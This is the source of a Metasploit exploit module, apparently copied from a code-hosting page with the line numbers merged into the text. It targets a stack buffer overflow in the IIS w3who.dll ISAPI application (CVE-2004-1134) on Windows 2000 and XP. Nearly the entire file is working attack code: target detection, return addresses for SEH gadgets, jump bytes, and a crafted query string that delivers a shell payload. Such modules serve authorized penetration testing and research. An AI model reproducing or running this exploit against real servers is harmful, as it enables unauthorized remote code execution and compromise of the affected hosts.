Path: blob/master/modules/exploits/windows/isapi/w3who_query.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78# XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] }9include Msf::Exploit::Remote::HttpClient1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',16'Description' => %q{17This module exploits a stack buffer overflow in the w3who.dll ISAPI18application. This vulnerability was discovered Nicolas19Gregoire and this code has been successfully tested against20Windows 2000 and Windows XP (SP2). When exploiting Windows21XP, the payload must call RevertToSelf before it will be22able to spawn a command shell.23},24'Author' => [ 'hdm' ],25'License' => MSF_LICENSE,26'References' => [27[ 'CVE', '2004-1134' ],28[ 'OSVDB', '12258' ],29[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],30[ 'BID', '11820' ]31],32'Privileged' => false,33'DefaultOptions' => {34'EXITFUNC' => 'process',35},36'Payload' => {37'Space' => 632,38'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",39'MinNops' => 128,40'StackAdjustment' => -3500,4142},43'Platform' => 'win',44'Targets' => [45['Automatic Detection', {}],46['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic47['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic48],49'DefaultTarget' => 0,50'DisclosureDate' => '2004-12-06',51'Notes' => {52'Reliability' => UNKNOWN_RELIABILITY,53'Stability' => UNKNOWN_STABILITY,54'SideEffects' => UNKNOWN_SIDE_EFFECTS55}56)57)5859register_options(60[61OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),62]63)64end6566def auto_target67res = send_request_raw(68{69'uri' => normalize_uri(datastore['URL'])70}, -171)72http_fingerprint({ :response => res }) # XXX: Needs custom body match7374# Was a vulnerable system detected?75t = nil76if (res and res.body =~ /Access Token/)77case res.headers['Server']78when /5\.1/79t = targets[2]80else81t = targets[1]82end83end84t85end8687def check88if auto_target89return Exploit::CheckCode::Appears90end9192Exploit::CheckCode::Safe93end9495def exploit96if (target.name =~ /Automatic/)97mytarget = auto_target98else99mytarget = target100end101102if not mytarget103fail_with(Failure::NoTarget, "No valid target found")104end105106buf = rand_text_english(8192, payload_badchars)107buf[mytarget['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"108buf[mytarget['Rets'][0] - 0, 4] = [ mytarget['Rets'][1] ].pack('V')109buf[mytarget['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')110buf[mytarget['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded111112print_status("Sending request...")113r = send_request_raw({114'uri' => normalize_uri(datastore['URL']),115'query' => buf116}, 5)117118handler119end120end121122123